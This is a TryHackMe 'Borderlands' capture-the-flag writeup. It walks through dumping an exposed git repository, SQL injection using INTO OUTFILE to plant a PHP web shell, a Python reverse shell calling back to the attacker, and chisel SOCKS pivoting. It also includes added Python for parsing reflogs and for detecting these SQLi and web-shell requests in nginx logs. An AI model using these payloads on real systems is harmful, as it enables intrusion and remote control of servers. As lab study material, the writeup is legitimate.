Borderlands — TryHackMe Writeup, OSCP Style

WraithOP
5 min read, Sep 9, 2021

Machine Environment

Enumeration

NMAP


```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1e:11:d6:ab:cc:f2:71:c8:40:e2:1d:97:07:09:6b:eb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvGF7If+TAlknFH/FDMXkhsCJ42eZhvyt/mFDlFw/JyFIWnzTarhTH8MU1o7qrTUUJ3YnlQhu2kjOVlgkL+r48ibhfkzoEmNAIy54kxFLXaC7hFkOpYPehtfCBvxzehclToZq8nsaECbPgEFFOUiFIdQ3yo87CHR1aWeaYh9KdrdObyWUsPRKqNHwVTXXUNhwlLsoJZDJccbH56rdGOpRf3oP1qqWfCUnMDN55o8fkgW0tVLdRFxvuRmlOKdEdCEB6VEDsp2z/QFtuDDSCGPwo1XDqp5SLRGIc+LKhAQZHhnBShaXmnvwLShGLqaU0EAzIBQ96dvNkkTAvZAzazMcN
| 256 cd:d6:f0:67:0e:1b:b3:2c:99:9f:7b:bb:70:42:b5:a5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLaioJd8smxzz0s9lMNoVu95NxoazDCi+ZMZ+sdxtPCiGpesRMmBZjyav7T4REZyqPR6vrvKymnnRio09JGuE6E=
| 256 e1:70:d2:f4:c9:73:6c:f0:d8:1f:d4:d8:a0:9f:8c:fc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsWZhy909do/TDDtLBrrwcU2A6mW99pJq4zV7IT2bG7
80/tcp open http syn-ack nginx 1.14.0 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.245.245:80/.git/
| Git repository found!
| .git/config matched patterns 'user'
| Repository description: Unnamed repository; edit this file 'description' to name the…
|_ Last commit message: added mobile apk for beta testing.
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Context Information Security — HackBack 2
```

SSH Version Username Enumeration Exploit

PORT 80


```
$ file config; cat config
config: ASCII text
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[user]
	name = Context Information Security
	email = recruitment@contextis.com
```

On /info.php

The Linux version is 4.4.0-1095. This is an older kernel version which can be easily exploited.

Enumerating GIT

Using this GitHub link.

I found this → http://10.10.245.245/.git/logs/HEAD


```
$ cat HEAD | cut -d ' ' -f 2
152b2d9976cd37a68fd462af8e4ce21356b5485e
93bab0a450caaa8c4d2632703636eccc69062bb4
79c9539b6566b06d6dec2755fdf58f5f9ec8822f
b2f776a52fe81a731c6c0fa896e7f9548aafceab
04f1f411857cc972ae8ed5efcffa298f5f6168fb
fee5595bb2ba1d1ab005ec3de98367fe5d021e9f
6db3cf70b469de942f2f529166088cdfbbd5f764
```

**NOTE: the first two characters of each hash are used as the object directory name under .git/objects/.**
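As an added illustration of the note above (my own example, not the writeup author's tooling), the Python below parses lines in the `.git/logs/HEAD` reflog format and turns each commit hash into the loose-object path git uses, where the first two hex characters become the directory. The hashes, committer name and email come from this page; the timestamps, the first message and which hash carries the "added mobile apk" message are constructed for the demo.

```python
import re
from typing import Dict, List

# One reflog line: "<old-sha> <new-sha> <Name> <email> <unix-ts> <tz>\t<message>"
REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) "
    r"(?P<author>.+?) <(?P<email>[^>]*)> (?P<ts>\d+) (?P<tz>[+-]\d{4})\t(?P<msg>.*)$"
)

# Constructed sample: hashes, committer and the last message are from this page,
# the timestamps, the first message and the hash/message pairing are made up.
SAMPLE_REFLOG = (
    "0000000000000000000000000000000000000000 "
    "152b2d9976cd37a68fd462af8e4ce21356b5485e "
    "Context Information Security <recruitment@contextis.com> 1577836800 +0000\t"
    "commit (initial): initial import\n"
    "152b2d9976cd37a68fd462af8e4ce21356b5485e "
    "93bab0a450caaa8c4d2632703636eccc69062bb4 "
    "Context Information Security <recruitment@contextis.com> 1577923200 +0000\t"
    "commit: added mobile apk for beta testing.\n"
)

def parse_reflog(text: str) -> List[Dict[str, str]]:
    """One dict per well-formed reflog line; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = REFLOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries

def object_path(sha: str) -> str:
    """Loose-object path for a SHA-1: the first two hex chars are the directory.

    Caveat: after `git gc` the object may only exist inside .git/objects/pack/,
    so the absence of this path does not mean the commit is gone.
    """
    sha = sha.lower()
    if not re.fullmatch(r"[0-9a-f]{40}", sha):
        raise ValueError("expected a 40-character hex SHA-1")
    return f".git/objects/{sha[:2]}/{sha[2:]}"

def commit_object_paths(text: str) -> List[str]:
    """Object path of every commit the reflog records (its 'new' column)."""
    return [object_path(e["new"]) for e in parse_reflog(text)]
```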

So I downloaded all commits.

I used this tool.


```
[+] Download and parse index file …
CTX_WSUSpect_White_Paper.pdf
Context_Red_Teaming_Guide.pdf
Context_White_Paper_Pen_Test_101.pdf
Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
Glibc_Adventures-The_Forgotten_Chunks.pdf
api.php
functions.php
home.php
index.php
info.php
[OK] api.php
[OK] functions.php
[OK] home.php
[OK] index.php
[OK] info.php
[OK] Context_White_Paper_Pen_Test_101.pdf
[OK] CTX_WSUSpect_White_Paper.pdf
[OK] Glibc_Adventures-The_Forgotten_Chunks.pdf
[OK] Context_Red_Teaming_Guide.pdf
[OK] Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
```

Now that I had the key, I visited the site.

http://10.10.245.245/api.php?apikey=WEBLhvOJAH8d50Z4y5G5

http://10.10.245.245/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1

So it is using a SQL connection.

Since documentid is the only parameter that reaches SQL, it is the candidate for SQL injection.

SQL INJECTION

So it is using MySQL.

The API key is checked using this function.

I made my payload by analyzing the above code.


```
http://10.10.20.199/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1 order by 3
```

but it does not show the result.

But the query is still being executed.


```
http://10.10.20.199/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1%20union%20all%20select%201,2,@@version into outfile '/var/www/html/whoami.html'
```

What this does is execute the query and store the output in http://IP/whoami.html.

YESSS!!

Now it is time for code execution.


```
http://10.10.20.199/api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1 union all select 1,2,"<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/rev.php"
```

!! BOOM!!


```
http://10.10.20.199/rev.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22IP%22,9001));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
```
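From the defensive side, the following added example (not part of the original post) shows detection logic for the traffic this section generates: it parses nginx combined-format access-log lines and flags `.git` probes, the `UNION ... INTO OUTFILE` injection through the `documentid` parameter, and a PHP tag in the query string. The log lines are constructed from the URLs above; the signature names and the `scan`/`offenders` functions are my own.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus, urlsplit

# nginx "combined" format: ip - user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# (signature name, pattern); matched against the URL-decoded request target.
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("git-exposure", re.compile(r"^/\.git(/|$)")),
    ("sqli-union",   re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("sqli-outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("sqli-probe",   re.compile(r"@@version|\border\s+by\s+\d+", re.I)),
    ("php-tag",      re.compile(r"<\?php", re.I)),
]

# Constructed sample log: the requests from this writeup plus one benign hit.
SAMPLE_LOG = """\
10.10.20.1 - - [09/Sep/2021:10:00:01 +0000] "GET /.git/logs/HEAD HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.10.20.1 - - [09/Sep/2021:10:00:02 +0000] "GET /api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.20.1 - - [09/Sep/2021:10:00:03 +0000] "GET /api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1%20union%20all%20select%201,2,@@version%20into%20outfile%20'/var/www/html/whoami.html' HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.20.1 - - [09/Sep/2021:10:00:04 +0000] "GET /api.php?apikey=WEBLhvOJAH8d50Z4y5G5&documentid=1%20union%20all%20select%201,2,%22%3C?php%20system($_GET['cmd']);%20?%3E%22%20into%20outfile%20%22/var/www/html/rev.php%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.20.2 - - [09/Sep/2021:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, signature, request path) for every flagged request.

    Decoding is done once; double-encoded payloads would need a second pass,
    the usual caveat for signature matching on URLs.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip instead of crashing the scan
        target = unquote_plus(m["target"])  # %20 -> space, %3C -> '<', etc.
        path = urlsplit(target).path
        for name, pattern in SIGNATURES:
            if pattern.search(target):
                hits.append((m["ip"], name, path))
    return hits

def offenders(log_text: str) -> List[str]:
    """Distinct client IPs with at least one hit, in first-seen order."""
    seen: List[str] = []
    for ip, _, _ in scan(log_text):
        if ip not in seen:
            seen.append(ip)
    return seen
```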

USER WWW-DATA

Flag location:

I connected to MySQL using these creds.

MySQL creds

These are the only things I have on this Docker machine.

So I got two ranges:

1. 172.16.1.0/24
2. 172.18.0.0/16

I created a PHP script to upload a file.

A second way to download a file:


```
$ python3
>>> import urllib.request
>>> url = 'http://IP:8000/chisel'
>>> urllib.request.urlretrieve(url, "chisel")
```

Pivoting through Reverse Socks Proxy

To learn this, watch https://www.youtube.com/watch?v=Yp4oxoQIBAM at 1:30:48.

Step 1: On the attacker machine


```
./chisel server -p 8000 -reverse
```

Step 2: On the victim machine


```
./chisel client <Your IP>:8000 R:8001:127.0.0.1:1337
```

Step 3: Again on the victim machine


```
./chisel server -p 1337 --socks5
```

Step 4: On the attacker machine


```
./chisel client 127.0.0.1:8001 socks
```

Add this line at the end of /etc/proxychains.conf:

172.16.1.128

vsFTPd Exploit

https://www.exploit-db.com/exploits/49757

We are already the root user on this machine.
